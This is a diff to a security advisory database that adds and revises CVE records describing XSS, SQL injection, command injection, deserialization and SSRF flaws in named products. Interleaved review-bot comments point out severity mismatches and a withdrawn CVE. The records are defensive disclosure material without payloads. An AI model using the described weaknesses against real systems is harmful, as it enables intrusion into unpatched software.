diff --git a/advisories/unreviewed/2024/01/GHSA-7jjr-w4qc-c237/GHSA-7jjr-w4qc-c237.json b/advisories/unreviewed/2024/01/GHSA-7jjr-w4qc-c237/GHSA-7jjr-w4qc-c237.json
new file mode 100644
index 0000000000000..60336fa51c811
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-7jjr-w4qc-c237/GHSA-7jjr-w4qc-c237.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7jjr-w4qc-c237",
+ "modified": "2024-01-30T06:30:23Z",
+ "published": "2024-01-30T06:30:23Z",
+ "aliases": [
+ "CVE-2024-1028"
+ ],
+ "details": "A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Post Handler. The manipulation of the argument Description with the input HACKED leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252301 was assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1028"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252301"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252301"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T05:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-7jm4-gcxp-f8vv/GHSA-7jm4-gcxp-f8vv.json b/advisories/unreviewed/2024/01/GHSA-7jm4-gcxp-f8vv/GHSA-7jm4-gcxp-f8vv.json
new file mode 100644
index 0000000000000..e3b7201092223
--- /dev/null
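Review bot: `database_specific.severity` is `"MODERATE"` for GHSA-7jjr-w4qc-c237, but the only vector recorded under `severity`, `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N`, evaluates to a 3.5 base score, which is the LOW band under the mapping the rest of this commit uses (9.8 is labelled CRITICAL in GHSA-7j85-cwr3-f2w3 and 7.3 HIGH in GHSA-7jm4-gcxp-f8vv). Either the label was derived from a vector other than the one stored, or the two fields are populated from different upstream sources; whichever is authoritative, the two should agree, and `"severity": "LOW"` is what the stored vector implies. Consumers filtering on the label and consumers recomputing from the vector currently get different answers for this record, so it is worth checking how the label is produced rather than patching this one file.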
+++ b/advisories/unreviewed/2024/01/GHSA-7jm4-gcxp-f8vv/GHSA-7jm4-gcxp-f8vv.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jm4-gcxp-f8vv", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2024-1009" + ], + "details": "A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Admin/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252278 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1009" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252278" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252278" + }, + { + "type": "WEB", + "url": "https://youtu.be/oL98TSjy89Q?si=_T6YkJZlbn7SJ4Gn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7jq7-8r3x-pjjq/GHSA-7jq7-8r3x-pjjq.json b/advisories/unreviewed/2024/01/GHSA-7jq7-8r3x-pjjq/GHSA-7jq7-8r3x-pjjq.json index ee5b968339061..edc2adc1fec09 100644 --- a/advisories/unreviewed/2024/01/GHSA-7jq7-8r3x-pjjq/GHSA-7jq7-8r3x-pjjq.json +++ b/advisories/unreviewed/2024/01/GHSA-7jq7-8r3x-pjjq/GHSA-7jq7-8r3x-pjjq.json 
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-7jq7-8r3x-pjjq",
- "modified": "2024-01-23T15:30:58Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T15:30:58Z",
 "aliases": [
 "CVE-2024-0753"
 ],
 "details": "In specific HSTS configurations an attacker could have bypassed HSTS on a subdomain. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
+ }
 ],
 "affected": [
 
@@ -26,6 +29,10 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html"
+ },
 {
 "type": "WEB",
 "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/"
@@ -43,7 +50,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T14:15:38Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-7m9h-xc4x-cg98/GHSA-7m9h-xc4x-cg98.json b/advisories/unreviewed/2024/01/GHSA-7m9h-xc4x-cg98/GHSA-7m9h-xc4x-cg98.json
new file mode 100644
index 0000000000000..d2d8baf004d6a
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-7m9h-xc4x-cg98/GHSA-7m9h-xc4x-cg98.json
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7m9h-xc4x-cg98", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-4551" + ], + "details": "Improper Input Validation vulnerability in OpenText AppBuilder on Windows, Linux allows OS Command Injection.\n\nThe AppBuilder's Scheduler functionality that facilitates creation of scheduled tasks is vulnerable to command injection. This allows authenticated users to inject arbitrary operating system commands into the executing process.\n\n\nThis issue affects AppBuilder: from 21.2 before 23.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4551" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_search&kb_category=61648712db61781068cfd6c4e296197b" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json b/advisories/unreviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json deleted file mode 100644 index f3c3c2dda6867..0000000000000 --- a/advisories/unreviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json +++ /dev/null 
@@ -1,50 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7mgg-3rq2-hff4", - "modified": "2024-01-27T12:30:25Z", - "published": "2024-01-27T12:30:25Z", - "aliases": [ - "CVE-2024-0960" - ], - "details": "A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file \\ai_flow\\cli\\commands\\workflow_command.py. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0960" - }, - { - "type": "WEB", - "url": "https://github.com/bayuncao/vul-cve-8" - }, - { - "type": "WEB", - "url": "https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl" - }, - { - "type": "WEB", - "url": "https://vuldb.com/?ctiid.252205" - }, - { - "type": "WEB", - "url": "https://vuldb.com/?id.252205" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-502" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-01-27T12:15:07Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7pvg-hvr4-rj6w/GHSA-7pvg-hvr4-rj6w.json b/advisories/unreviewed/2024/01/GHSA-7pvg-hvr4-rj6w/GHSA-7pvg-hvr4-rj6w.json new file mode 100644 index 0000000000000..9de7e9281d575 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7pvg-hvr4-rj6w/GHSA-7pvg-hvr4-rj6w.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pvg-hvr4-rj6w", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2024-1036" + ], + "details": "A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function uploadIcon of the file /application/index/controller/Screen.php of the component Icon Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252311.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1036" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/X1ASzPP5rHel" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252311" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252311" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T18:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7qfc-6cw5-2ppm/GHSA-7qfc-6cw5-2ppm.json b/advisories/unreviewed/2024/01/GHSA-7qfc-6cw5-2ppm/GHSA-7qfc-6cw5-2ppm.json index a16e1daaadfcf..6551334e86a1a 100644 --- a/advisories/unreviewed/2024/01/GHSA-7qfc-6cw5-2ppm/GHSA-7qfc-6cw5-2ppm.json +++ b/advisories/unreviewed/2024/01/GHSA-7qfc-6cw5-2ppm/GHSA-7qfc-6cw5-2ppm.json 
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-7qfc-6cw5-2ppm",
- "modified": "2024-01-19T18:30:28Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-19T18:30:28Z",
 "aliases": [
 "CVE-2023-47033"
 ],
 "details": "MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
 ],
 "affected": [
 
@@ -31,7 +34,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-19T17:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-7qg3-c5c5-86rv/GHSA-7qg3-c5c5-86rv.json b/advisories/unreviewed/2024/01/GHSA-7qg3-c5c5-86rv/GHSA-7qg3-c5c5-86rv.json
index b82aa9f5ead63..5bea9c878794f 100644
--- a/advisories/unreviewed/2024/01/GHSA-7qg3-c5c5-86rv/GHSA-7qg3-c5c5-86rv.json
+++ b/advisories/unreviewed/2024/01/GHSA-7qg3-c5c5-86rv/GHSA-7qg3-c5c5-86rv.json
@@ -44,7 +44,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-121"
+ "CWE-121",
+ "CWE-787"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-7r27-33fg-9cpx/GHSA-7r27-33fg-9cpx.json b/advisories/unreviewed/2024/01/GHSA-7r27-33fg-9cpx/GHSA-7r27-33fg-9cpx.json
index 628d8230711b9..bc971a0d5563d 100644
--- a/advisories/unreviewed/2024/01/GHSA-7r27-33fg-9cpx/GHSA-7r27-33fg-9cpx.json
+++ b/advisories/unreviewed/2024/01/GHSA-7r27-33fg-9cpx/GHSA-7r27-33fg-9cpx.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-7r27-33fg-9cpx",
- "modified": "2024-01-24T18:31:01Z",
+ "modified": "2024-01-31T21:31:03Z",
 "published": "2024-01-24T18:31:01Z",
 "aliases": [
 "CVE-2021-42144"
 ],
 "details": "Buffer over-read vulnerability in Contiki-NG tinyDTLS through master branch 53a0d97 allows attackers obtain sensitive information via crafted input to dtls_ccm_decrypt_message().",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-125"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-24T18:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-7v3h-fr8r-9pvm/GHSA-7v3h-fr8r-9pvm.json b/advisories/unreviewed/2024/01/GHSA-7v3h-fr8r-9pvm/GHSA-7v3h-fr8r-9pvm.json
index 045f6db085450..9e037cb4785d4 100644
--- a/advisories/unreviewed/2024/01/GHSA-7v3h-fr8r-9pvm/GHSA-7v3h-fr8r-9pvm.json
+++ b/advisories/unreviewed/2024/01/GHSA-7v3h-fr8r-9pvm/GHSA-7v3h-fr8r-9pvm.json
@@ -32,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-7vrx-mj2w-52mf/GHSA-7vrx-mj2w-52mf.json b/advisories/unreviewed/2024/01/GHSA-7vrx-mj2w-52mf/GHSA-7vrx-mj2w-52mf.json
index c3cbd49df44a7..39b4163c8f683 100644
--- a/advisories/unreviewed/2024/01/GHSA-7vrx-mj2w-52mf/GHSA-7vrx-mj2w-52mf.json
+++ b/advisories/unreviewed/2024/01/GHSA-7vrx-mj2w-52mf/GHSA-7vrx-mj2w-52mf.json
@@ -28,6 +28,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-78",
 "CWE-94"
 ],
 "severity": "HIGH",
diff --git a/advisories/unreviewed/2024/01/GHSA-7wff-94vq-2q76/GHSA-7wff-94vq-2q76.json b/advisories/unreviewed/2024/01/GHSA-7wff-94vq-2q76/GHSA-7wff-94vq-2q76.json
index a01eea66691e6..9c1b5e68a0ab9 100644
--- a/advisories/unreviewed/2024/01/GHSA-7wff-94vq-2q76/GHSA-7wff-94vq-2q76.json
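Review bot: The vector added for GHSA-7r27-33fg-9cpx, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` (9.8, labelled CRITICAL in the second hunk), asserts high integrity and availability impact, while the `details` text describes a buffer over-read that lets attackers "obtain sensitive information" and the second hunk classifies it as CWE-125, an out-of-bounds read. The file mirrors the upstream score, so nothing here is malformed, but a confidentiality-only description paired with an all-High vector is exactly the discrepancy that should be confirmed before the record leaves the unreviewed tree. If the upstream vector is intentionally kept, recording that it was checked in the PR discussion, not in the JSON, would help the next reader.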
+++ b/advisories/unreviewed/2024/01/GHSA-7wff-94vq-2q76/GHSA-7wff-94vq-2q76.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7wff-94vq-2q76", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-02-06T15:32:04Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-35835" ], "details": "An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. The device provides a WiFi access point for initial configuration. The WiFi network provided has no network authentication (such as an encryption key) and persists permanently, including after enrollment and setup is complete. The WiFi network serves a web-based configuration utility, as well as an unauthenticated ModBus protocol interface.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T23:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-82g7-hvfx-485f/GHSA-82g7-hvfx-485f.json b/advisories/unreviewed/2024/01/GHSA-82g7-hvfx-485f/GHSA-82g7-hvfx-485f.json new file mode 100644 index 0000000000000..bda17ffb1fdd9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-82g7-hvfx-485f/GHSA-82g7-hvfx-485f.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82g7-hvfx-485f", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2023-7089" + ], + "details": "The Easy SVG Allow WordPress plugin through 1.0 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7089" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/3b8ba734-7764-4ab6-a7e2-8de55bd46bed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-835p-c6x8-xh5f/GHSA-835p-c6x8-xh5f.json b/advisories/unreviewed/2024/01/GHSA-835p-c6x8-xh5f/GHSA-835p-c6x8-xh5f.json index 89aa1582f511e..fe7e47a41b5da 100644 --- a/advisories/unreviewed/2024/01/GHSA-835p-c6x8-xh5f/GHSA-835p-c6x8-xh5f.json +++ b/advisories/unreviewed/2024/01/GHSA-835p-c6x8-xh5f/GHSA-835p-c6x8-xh5f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-835p-c6x8-xh5f", - "modified": "2024-01-02T12:30:18Z", + "modified": "2024-02-08T12:30:48Z", "published": "2024-01-02T12:30:18Z", "aliases": [ "CVE-2023-6693" @@ -28,6 +28,10 @@ { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254580" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0004/" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-83wx-v283-85g9/GHSA-83wx-v283-85g9.json b/advisories/unreviewed/2024/01/GHSA-83wx-v283-85g9/GHSA-83wx-v283-85g9.json index 2ba7444cde3cc..7d765d3756291 100644 
--- a/advisories/unreviewed/2024/01/GHSA-83wx-v283-85g9/GHSA-83wx-v283-85g9.json +++ b/advisories/unreviewed/2024/01/GHSA-83wx-v283-85g9/GHSA-83wx-v283-85g9.json @@ -36,6 +36,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-84m5-rqxq-483p/GHSA-84m5-rqxq-483p.json b/advisories/unreviewed/2024/01/GHSA-84m5-rqxq-483p/GHSA-84m5-rqxq-483p.json index a858bfc067093..70bcb3bc8bc50 100644 --- a/advisories/unreviewed/2024/01/GHSA-84m5-rqxq-483p/GHSA-84m5-rqxq-483p.json +++ b/advisories/unreviewed/2024/01/GHSA-84m5-rqxq-483p/GHSA-84m5-rqxq-483p.json @@ -36,6 +36,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-79", "CWE-80" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2024/01/GHSA-8523-f95g-92mc/GHSA-8523-f95g-92mc.json b/advisories/unreviewed/2024/01/GHSA-8523-f95g-92mc/GHSA-8523-f95g-92mc.json index 768b2fa37993c..d9d423ac6e64c 100644 --- a/advisories/unreviewed/2024/01/GHSA-8523-f95g-92mc/GHSA-8523-f95g-92mc.json +++ b/advisories/unreviewed/2024/01/GHSA-8523-f95g-92mc/GHSA-8523-f95g-92mc.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8523-f95g-92mc", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-38624" ], "details": "A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis is a similar, but not identical vulnerability as CVE-2023-38625 through CVE-2023-38627.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8622-rmmr-47jv/GHSA-8622-rmmr-47jv.json b/advisories/unreviewed/2024/01/GHSA-8622-rmmr-47jv/GHSA-8622-rmmr-47jv.json new file mode 100644 index 0000000000000..93365eff41cf9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8622-rmmr-47jv/GHSA-8622-rmmr-47jv.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8622-rmmr-47jv", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6389" + ], + "details": "The WordPress Toolbar WordPress plugin through 2.2.6 redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6389" + }, + { + "type": "WEB", + "url": "https://magos-securitas.com/txt/CVE-2023-6389.txt" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-863w-397j-xxp5/GHSA-863w-397j-xxp5.json b/advisories/unreviewed/2024/01/GHSA-863w-397j-xxp5/GHSA-863w-397j-xxp5.json new file mode 100644 index 0000000000000..66b6cb0df2c58 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-863w-397j-xxp5/GHSA-863w-397j-xxp5.json 
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-863w-397j-xxp5",
+ "modified": "2024-01-30T06:30:23Z",
+ "published": "2024-01-30T06:30:23Z",
+ "aliases": [
+ "CVE-2023-45923"
+ ],
+ "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45923"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T06:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-867h-h9jh-9vf4/GHSA-867h-h9jh-9vf4.json b/advisories/unreviewed/2024/01/GHSA-867h-h9jh-9vf4/GHSA-867h-h9jh-9vf4.json
index b1303230b9a8e..79101295ef421 100644
--- a/advisories/unreviewed/2024/01/GHSA-867h-h9jh-9vf4/GHSA-867h-h9jh-9vf4.json
+++ b/advisories/unreviewed/2024/01/GHSA-867h-h9jh-9vf4/GHSA-867h-h9jh-9vf4.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-867h-h9jh-9vf4",
- "modified": "2024-01-24T00:30:33Z",
+ "modified": "2024-01-29T15:30:24Z",
 "published": "2024-01-24T00:30:33Z",
 "aliases": [
 "CVE-2024-0813"
 ],
 "details": "Use after free in Reading Mode in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium)",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -37,9 +40,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-24T00:15:08Z"
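Review bot: GHSA-863w-397j-xxp5 records a CVE whose `details` say it was withdrawn by its CNA and "was not a security issue", yet the file is written as an ordinary advisory with `"severity": null` and an empty `affected`, which is indistinguishable from a live advisory that has simply not been scored yet. OSV schema 1.4.0, which the file declares, provides a top-level `withdrawn` field holding an RFC 3339 timestamp for exactly this situation; setting it (for example `"withdrawn": "2024-01-30T06:30:23Z"`, reusing the record's `modified` time as a placeholder) would let downstream consumers drop the record without parsing the prose. The same consideration applies to any other rejected CVE the sync imports. The other unit on this line, GHSA-867h-h9jh-9vf4, adds a vector and CWE that agree with each other and with its HIGH label.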
diff --git a/advisories/unreviewed/2024/01/GHSA-86pm-fpxw-jjjc/GHSA-86pm-fpxw-jjjc.json b/advisories/unreviewed/2024/01/GHSA-86pm-fpxw-jjjc/GHSA-86pm-fpxw-jjjc.json new file mode 100644 index 0000000000000..561f8c8bea2ae --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-86pm-fpxw-jjjc/GHSA-86pm-fpxw-jjjc.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86pm-fpxw-jjjc", + "modified": "2024-01-29T18:31:50Z", + "published": "2024-01-29T18:31:50Z", + "aliases": [ + "CVE-2023-40549" + ], + "details": "An out-of-bounds read flaw was found in Shim due to the lack of proper boundary verification during the load of a PE binary. This flaw allows an attacker to load a crafted PE binary, triggering the issue and crashing Shim, resulting in a denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40549" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-40549" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241797" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json b/advisories/unreviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json deleted file mode 100644 index 90d223cae388d..0000000000000 --- a/advisories/unreviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json +++ /dev/null 
